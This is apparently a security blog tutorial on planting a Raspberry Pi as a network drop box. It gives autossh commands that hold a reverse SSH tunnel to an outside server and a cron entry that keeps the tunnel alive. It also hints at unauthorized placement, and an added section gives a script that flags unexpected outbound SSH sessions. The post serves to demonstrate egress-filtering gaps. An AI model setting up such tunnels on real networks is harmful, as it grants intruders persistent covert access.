Persistent Reverse-SSH Tunnel on a RaspberryPi

I have a couple of old Raspberry Pi 2s lying around and have been meaning to turn them into "Remote Access Terminals" to demonstrate what happens if you do not do effective egress filtering on your network. At a high level, if an attacker can plug one of these into your network and it can reach the internet, they own your network.

Here is a terrible diagram I put together using draw.io to explain:


To set this up you will need the following:

There are plenty of guides on setting this up so I won't spend time doing that here. Once you have that complete and are on the Pi you can run the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data back and forth between the Pi and the server (that is how it notices a dead connection and restarts it), and it opens an SSH session to the public server that binds port 2222 on that server's loopback interface and tunnels it back to the SSH port on the Pi.

Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 pi@127.0.0.1

Congratulations, you now have a host on a private network that you can control from the internet (one that you totally have permission to be plugged into, right?).


While this works, if the Pi has any problems (a reboot, for example) the tunnel will be gone, so we will use a cron job to make sure that it is always up. You can use the following crontab entry, which runs every minute and starts the tunnel in a detached screen session. Note the user field (`pi`): this is the /etc/crontab or /etc/cron.d format, not the format of the pi user's own crontab.

* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean

Reboot the Pi to test and you should be good to go.
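On the defender side, as an added example that is not part of the original post: the tunnel above is a long-lived outbound SSH session to a public host, kept ESTAB by the ServerAlive keepalives, so it is visible in `ss` output on the Pi or in flow logs at the network edge. The POSIX shell function below scans `ss -tnH` style lines and flags established connections to port 22 whose peer is not on an allowlist; the allowlist addresses and the `ss` lines are constructed sample values.

```shell
#!/bin/sh
# Added example (not from the original post): flag established outbound SSH
# sessions whose peer is not an approved SSH server. Input is the format of
# `ss -tnH`: state, recv-q, send-q, local addr:port, peer addr:port.

# Assumed allowlist of remote SSH hosts that internal machines may reach.
ALLOWED_SSH_PEERS="10.0.0.5 10.0.0.6"

# flag_unexpected_ssh: reads ss-style lines from stdin and prints the peer
# address of every ESTAB connection whose peer port is 22 and whose peer
# host is not in ALLOWED_SSH_PEERS. Returns 1 if anything was flagged, else 0.
flag_unexpected_ssh() {
    found=0
    while read -r state recvq sendq laddr peer rest; do
        [ "$state" = "ESTAB" ] || continue
        peer_host=${peer%:*}      # strip the trailing :port (IPv6 stays bracketed)
        peer_port=${peer##*:}
        [ "$peer_port" = "22" ] || continue
        allowed=0
        for a in $ALLOWED_SSH_PEERS; do
            [ "$a" = "$peer_host" ] && allowed=1
        done
        if [ "$allowed" -eq 0 ]; then
            echo "$peer_host"
            found=1
        fi
    done
    return "$found"
}

# Constructed sample of `ss -tnH` output: an HTTPS session, an approved SSH
# session, one outbound SSH session to an unknown public host, and a closed one.
SAMPLE_SS='ESTAB 0 0 192.168.1.40:51234 93.184.216.34:443
ESTAB 0 0 192.168.1.40:51300 10.0.0.5:22
ESTAB 0 0 192.168.1.40:51412 203.0.113.10:22
TIME-WAIT 0 0 192.168.1.40:51000 203.0.113.10:22'

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SS" | flag_unexpected_ssh
fi
```

Run with `--demo` to see the single flagged peer; in practice feed it live `ss -tnH` output, and remember that a tunnel using a port other than 22 needs the port test widened or an egress rule that only permits known destinations.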
